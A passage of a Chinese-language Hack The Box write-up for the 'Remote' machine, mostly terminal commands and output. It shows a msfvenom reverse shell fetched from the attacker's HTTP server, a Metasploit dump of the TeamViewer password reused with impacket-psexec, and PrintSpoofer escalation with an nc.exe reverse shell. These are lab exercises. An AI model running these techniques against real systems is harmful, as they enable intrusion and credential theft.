PS C:\windows\system32\inetsrv> 


PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/20/2020   1:13 AM                ftp_transfer                                                          
d-----        2/19/2020   3:11 PM                inetpub                                                               
d-----        2/19/2020  11:09 PM                Microsoft                                                             
d-----        9/15/2018   3:19 AM                PerfLogs                                                              
d-r---         7/9/2021   7:41 AM                Program Files                                                         
d-----        2/23/2020   2:19 PM                Program Files (x86)                                                   
d-----        3/16/2024   9:34 AM                site_backups                                                          
d-r---        2/19/2020   3:12 PM                Users                                                                 
d-----        8/17/2021   9:34 AM                Windows                                                               

PS C:\> 

PS C:\> cd Users
PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/19/2020   3:12 PM                .NET v2.0                                                             
d-----        2/19/2020   3:12 PM                .NET v2.0 Classic                                                     
d-----        2/19/2020   3:12 PM                .NET v4.5                                                             
d-----        2/19/2020   3:12 PM                .NET v4.5 Classic                                                     
d-----         7/9/2021   6:50 AM                Administrator                                                         
d-----        2/19/2020   3:12 PM                Classic .NET AppPool                                                  
d-r---         1/9/2024   9:48 AM                Public                                                                


PS C:\Users> cd Public
PS C:\Users\Public> ls


    Directory: C:\Users\Public


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-r---         1/9/2024   9:48 AM                Desktop                                                               
d-r---        2/19/2020   3:03 PM                Documents                                                             
d-r---        9/15/2018   3:19 AM                Downloads                                                             
d-r---        9/15/2018   3:19 AM                Music                                                                 
d-r---        9/15/2018   3:19 AM                Pictures                                                              
d-r---        9/15/2018   3:19 AM                Videos                                                                


PS C:\Users\Public> cd Desktop
PS C:\Users\Public\Desktop>

20、获取第一个flag信息

PS C:\Users\Public\Desktop> ls


    Directory: C:\Users\Public\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        2/20/2020   2:14 AM           1191 TeamViewer 7.lnk                                                      
-ar---        3/16/2024   9:34 AM             34 user.txt                                                              


PS C:\Users\Public\Desktop> type user.txt
f33a1e79153d44d09c2dee1b8ab162ee
PS C:\Users\Public\Desktop>

0x02 系统权限获取

21、查看下当前用户名和任务进程服务情况

PS C:\Users\Public\Desktop> whoami
iis apppool\defaultapppool
PS C:\Users\Public\Desktop> tasklist /svc

Image Name                     PID Services                                    
========================= ======== ============================================
System Idle Process              0 N/A                                         
System                           4 N/A                                         
Registry                        88 N/A                                         
smss.exe                       296 N/A                                         
csrss.exe                      372 N/A                                         
wininit.exe                    480 N/A                                         
csrss.exe                      488 N/A                                         
winlogon.exe                   544 N/A                                         
services.exe                   616 N/A                                         
lsass.exe                      636 KeyIso, SamSs                               
svchost.exe                    736 BrokerInfrastructure, DcomLaunch, LSM,      
                                   PlugPlay, Power, SystemEventsBroker         
fontdrvhost.exe                756 N/A                                         
fontdrvhost.exe                764 N/A                                         
svchost.exe                    844 RpcEptMapper, RpcSs                         
dwm.exe                        924 N/A                                         
svchost.exe                    968 DsmSvc, gpsvc, IKEEXT, iphlpsvc, ProfSvc,   
                                   Schedule, SENS, ShellHWDetection, Themes,   
                                   UserManager, UsoSvc, Winmgmt, wlidsvc,      
                                   WpnService                                  
svchost.exe                     64 Dhcp, EventLog, lmhosts, TimeBrokerSvc,     
                                   WinHttpAutoProxySvc                         
svchost.exe                    332 DsSvc, NcbService, PcaSvc, SysMain, TrkWks, 
                                   UALSVC                                      
svchost.exe                    364 CoreMessagingRegistrar, DPS                 
svchost.exe                   1096 CDPSvc, EventSystem, FontCache, netprofm,   
                                   nsi, SstpSvc                                
vm3dservice.exe               1104 vm3dservice                                 
svchost.exe                   1208 CryptSvc, Dnscache, LanmanWorkstation,      
                                   NlaSvc, WinRM                               
svchost.exe                   1316 Wcmsvc                                      
svchost.exe                   1452 BFE, mpssvc                                 
svchost.exe                   1688 PolicyAgent                                 
spoolsv.exe                   1380 Spooler                                     
svchost.exe                   2060 AppHostSvc                                  
svchost.exe                   2076 DiagTrack                                   
svchost.exe                   2096 ftpsvc                                      
inetinfo.exe                  2124 IISADMIN                                    
svchost.exe                   2212 W32Time                                     
svchost.exe                   2220 W3SVC, WAS                                  
vmtoolsd.exe                  2232 VMTools                                     
VGAuthService.exe             2244 VGAuthService                               
svchost.exe                   2260 LanmanServer                                
TeamViewer_Service.exe        2308 TeamViewer7                                 
MsMpEng.exe                   2340 WinDefend                                   
svchost.exe                   2372 RasMan                                      
nfssvc.exe                    2528 NfsService                                  
dllhost.exe                   3128 COMSysApp                                   
WmiPrvSE.exe                  3408 N/A                                         
msdtc.exe                     3552 MSDTC                                       
LogonUI.exe                   4072 N/A                                         
SearchIndexer.exe             1784 WSearch                                     
svchost.exe                   1132 StateRepository                             
svchost.exe                   1628 WaaSMedicSvc                                
w3wp.exe                      3452 N/A                                         
win32calc.exe                 1704 N/A                                         
win32calc.exe                 2916 N/A                                         
win32calc.exe                 4808 N/A                                         
cmd.exe                       2844 N/A                                         
conhost.exe                   1576 N/A                                         
cmd.exe                       4172 N/A                                         
conhost.exe                   4712 N/A                                         
powershell.exe                5048 N/A                                         
svchost.exe                   3808 ClipSVC                                     
tasklist.exe                   700 N/A                                         
PS C:\Users\Public\Desktop>

22、这里都出现了 TeamViewer7 ，继续看一下系统信息

PS C:\Users\Public\Desktop> systeminfo

Host Name:                 REMOTE
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA801
Original Install Date:     2/19/2020, 4:03:29 PM
System Boot Time:          3/16/2024, 9:33:47 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 813 MB
Virtual Memory: Max Size:  2,431 MB
Virtual Memory: Available: 1,287 MB
Virtual Memory: In Use:    1,144 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB4534119
                           [02]: KB4516115
                           [03]: KB4523204
                           [04]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.180
                                 [02]: fe80::29a0:a9bd:5eac:de7b
                                 [03]: dead:beef::29a0:a9bd:5eac:de7b
                                 [04]: dead:beef::24e
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\Users\Public\Desktop>

23、继续查一下TeamViewer的版本信息，是不是版本号7

PS C:\Users\Public\Desktop> 
PS C:\Users\Public\Desktop> (Get-Command "C:\Program Files (x86)\TeamViewer\Version7\TeamViewer.exe").Version

Major  Minor  Build  Revision
-----  -----  -----  --------
7      0      0      0       


PS C:\Users\Public\Desktop>

24、这里有两个思路，一个是使用msf的直接加载teamviever的漏洞提权，一个是使用烂土豆，我们使用msf的进行提权，简单快捷

25、生成一个反弹shell的exe执行文件

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

26、下载到目标靶机上面

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.180 - - [16/Mar/2024 22:41:01] "GET /reverse.exe HTTP/1.1" 200 -


PS C:\Users\Public> cd Downloads
PS C:\Users\Public\Downloads> ls
PS C:\Users\Public\Downloads> iwr -uri http://10.10.14.8:8000/reverse.exe -Outfile reverse.exe
PS C:\Users\Public\Downloads> dir


    Directory: C:\Users\Public\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        3/16/2024  10:41 AM           7168 reverse.exe                                                           


PS C:\Users\Public\Downloads>

27、启动msf

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfconsole                                                                                      
Metasploit tip: You can pivot connections over sessions started with the 
ssh_login modules
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Started reverse TCP handler on 0.0.0.0:4444

28、开始进行msf提权利用

msf6 exploit(multi/handler) > 
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (200774 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.180:49714) at 2024-03-16 22:42:34 +0800

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x64/windows  IIS APPPOOL\DefaultAppPool @ REMOTE  10.10.14.8:4444 -> 10.10.10.180:497
                                                                          14 (10.10.10.180)

msf6 exploit(multi/handler) > 

msf6 exploit(multi/handler) > search TeamViewer

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/server/teamviewer_uri_smb_redirect                           normal  No     TeamViewer Unquoted URI Handler SMB Redirect
   1  post/windows/gather/credentials/teamviewer_passwords                   normal  No     Windows Gather TeamViewer Passwords                                                                                               


Interact with a module by name or index. For example info 1, use 1 or use post/windows/gather/credentials/teamviewer_passwords                                                                                                

msf6 exploit(multi/handler) > use 1
msf6 post(windows/gather/credentials/teamviewer_passwords) > show options

Module options (post/windows/gather/credentials/teamviewer_passwords):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   SESSION                        yes       The session to run this module on
   WINDOW_TITLE  TeamViewer       no        Specify a title for getting the window handle, e.g. TeamViewer


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/teamviewer_passwords) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/credentials/teamviewer_passwords) > run

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/kali/.msf4/loot/20240316224650_default_10.10.10.180_host.teamviewer__314338.txt
[*] <---------------- | Using Window Technique | ---------------->
[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is ''
[-] Unable to find TeamViewer's process
[*] Post module execution completed
msf6 post(windows/gather/credentials/teamviewer_passwords) >

29、查看本次获取到的密码信息

1
2
3

administrator

!R3m0te!

30、开启psexec，拿到最终flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec Administrator@10.10.10.180
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file sbEiloUw.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service sCuK on 10.10.10.180.....
[*] Starting service sCuK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:/Users/Administrator
 
C:\Users\Administrator> cd Desktop
 
C:\Users\Administrator\Desktop> type root.txt
ce97750dd34949048b839958825ff45d

C:\Users\Administrator\Desktop>

附录：

土豆提权一览：

PS C:\Users\Public\Downloads> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Users\Public\Downloads> 



iwr -uri http://10.10.14.8:8000/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe


┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.180 - - [16/Mar/2024 22:58:45] "GET /PrintSpoofer64.exe HTTP/1.1" 200 -

PS C:\Users\Public\Downloads> iwr -uri http://10.10.14.8:8000/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
PS C:\Users\Public\Downloads> dir 


    Directory: C:\Users\Public\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        3/16/2024  10:58 AM          27136 PrintSpoofer64.exe                                                    
-a----        3/16/2024  10:41 AM           7168 reverse.exe    
                                   
PS C:\Users\Public\Downloads> ./PrintSpoofer64.exe -h

PrintSpoofer v0.1 (by @itm4n)

  Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
  Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()

Arguments:
  -c <CMD>    Execute the command *CMD*
  -i          Interact with the new process in the current command prompt (default is non-interactive)
  -d <ID>     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
  -h          That's me :)

Examples:
  - Run PowerShell as SYSTEM in the current console
      PrintSpoofer.exe -i -c powershell.exe
  - Spawn a SYSTEM command prompt on the desktop of the session 1
      PrintSpoofer.exe -d 1 -c cmd.exe
  - Get a SYSTEM reverse shell
      PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"

PS C:\Users\Public\Downloads>



iwr -uri http://10.10.14.8:8000/nc.exe -Outfile nc.exe


PS C:\Users\Public\Downloads> iwr -uri http://10.10.14.8:8000/nc.exe -Outfile nc.exe
PS C:\Users\Public\Downloads> dir


    Directory: C:\Users\Public\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        3/16/2024  11:05 AM          68608 nc.exe                                                                
-a----        3/16/2024  10:58 AM          27136 PrintSpoofer64.exe                                                    
-a----        3/16/2024  10:41 AM           7168 reverse.exe                                                 

PS C:\Users\Public\Downloads> 

./PrintSpoofer64.exe -c "C:\Users\Public\Downloads\nc.exe 10.10.14.8 10086 -e cmd"

C:/Users/Administrator/Desktop/root.txt


PS C:\Users\Public\Downloads> ./PrintSpoofer64.exe -c "C:\Users\Public\Downloads\nc.exe 10.10.14.8 10086 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
PS C:\Users\Public\Downloads> 


┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 10086      
listening on [any] 10086 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.180] 49728
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Windows\system32>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Windows\system32>cd C:/Users/Administrator/Desktop/        
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D582-9880

 Directory of C:\Users\Administrator\Desktop

02/20/2020  03:41 AM    <DIR>          .
02/20/2020  03:41 AM    <DIR>          ..
03/16/2024  09:34 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  13,176,942,592 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ce97750dd34949048b839958825ff45d

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/234

打靶记

#shooting-range

Remote-htb-writeup

https://sh1yan.top/2024/03/16/Remote-htb-writeup/

作者

shiyan

发布于

2024年3月16日

许可协议

ServMon-htb-writeup 上一篇

Bastion-htb-writeup 下一篇